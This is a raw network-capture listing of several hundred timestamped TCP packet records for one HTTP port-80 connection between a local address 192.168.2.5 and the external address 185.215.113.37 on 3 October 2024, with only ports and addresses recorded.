Oct 3, 2024 21:36:14.658096075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.658113003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.658128023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.658134937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.658168077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.658173084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.658206940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725369930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725399017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725409031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725415945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725425959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725444078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725449085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725485086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725557089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725567102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725591898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725603104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725660086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725668907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725680113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725689888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725714922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725843906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725853920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725862026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725868940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725876093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725884914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725898027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725903988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725913048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.725929976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.725944996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726191998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726201057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726211071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726221085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726227045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726236105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726248980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726258039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726264954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726289988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726466894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726475954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726485968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726495028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726501942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726512909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726520061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726528883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726545095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726560116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726711035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726748943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726887941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726897955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726907969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726917982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726927996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726933956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726943970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726953030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726959944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726969004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.726975918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726985931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.726993084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727001905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727011919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727019072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727026939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727036953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727047920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727061033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727087975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727669001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727679014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727689028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727699041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727705956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727715015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727725029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727732897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727741003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727747917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727756977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727766037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727775097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727782011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727792025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727803946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727812052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727818012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727827072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727837086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727843046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727852106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727861881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.727869034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.727895975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729727030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729737043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729744911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729754925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729764938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729773998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729780912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729789972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729799986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729805946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729816914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729824066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729831934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729839087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729847908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729861021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729868889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729876995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729887962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729897022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729906082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729912996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729921103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729932070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729938984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729947090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.729964972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.729979992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730185986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730195045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730204105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730216026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730220079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730227947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730235100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730242968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730252981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730258942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730268002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730273962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730294943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730302095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730310917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730320930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730329037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730336905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730349064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730354071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730366945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730371952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730386972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730391979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730402946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730411053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730417967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730426073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730432987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.730439901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730454922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.730472088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.731097937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731107950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731117010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731126070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731136084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731142998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.731152058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731159925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.731167078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731177092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731185913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.731193066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731204987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731209040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.731218100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731224060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.731234074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.731251955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.731276989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.745134115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.745145082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.745153904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.745163918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.745193958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.745213032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.745266914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.745301008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.745307922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.745317936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.745340109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.745354891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812408924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812448978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812459946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812472105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812494993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812500000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812541008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812609911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812619925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812629938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812639952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812655926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812685013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812751055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812792063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812851906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812860966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812870979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812881947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812895060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812899113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812907934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.812923908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.812939882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813169956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813179970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813189983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813199997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813230038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813266993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813308954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813318968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813328981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813338041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813344002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813354015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813364029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813380003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813671112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813680887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813689947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813699961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813709021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813718081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813725948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813735962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813743114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813751936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813762903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813771009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813779116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.813795090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.813812017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814167976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814177990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814187050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814198017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814203024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814213037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814218998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814229965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814241886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814245939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814255953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814263105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814273119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814286947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814307928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814326048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814714909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814724922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814735889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814745903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814757109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814763069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814773083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814784050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814789057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814799070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814805984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814815998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814825058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814832926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814845085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814850092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.814871073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.814889908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815254927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815264940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815274954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815284967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815293074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815301895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815315008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815320015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815330029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815342903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815352917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815362930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815392017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815589905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815634012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815707922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815717936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815727949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815737963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815748930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815753937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815763950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815777063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815781116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815795898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815803051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815812111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815819025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815829039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815839052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815849066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815855026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815865993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815876007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815884113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815891981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.815900087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.815924883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816451073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816459894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816498041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816589117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816600084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816610098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816620111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816629887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816637993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816651106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816656113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816664934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816672087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816680908 CEST	80	49704	185.215.113.37	192.168.2.5
